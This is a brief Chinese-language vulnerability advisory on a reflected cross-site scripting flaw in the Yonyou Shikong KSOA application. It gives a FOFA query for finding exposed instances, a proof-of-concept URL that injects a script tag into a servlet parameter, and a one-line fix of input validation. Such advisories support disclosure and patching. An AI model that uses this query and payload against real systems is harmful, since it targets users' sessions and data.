漏洞描述
用友时空KSOA 存在反射型跨站脚本攻击(XSS)漏洞,通过向用户提供恶意链接或注入恶意代码来利用。当用户点击这些链接或访问包含恶意代码的页面时,攻击者可以在用户的浏览器中执行恶意脚本,从而窃取用户信息、会话令牌等敏感数据或对用户进行其他有害操作。及时修复这种漏洞非常重要,以确保系统和用户数据的安全。
资产测绘
FOFA:app="用友-时空KSOA"
漏洞复现
POC
http://IP/servlet/com.sksoft.v8.portal.Dispatcher?functionid=%3CsCrIpT%3Ealert(1)%3C/ScRiPt%3E&uuid=@1.1.1.1&runmode=direct&pid=null
漏洞修复
对系统做输入验证和过滤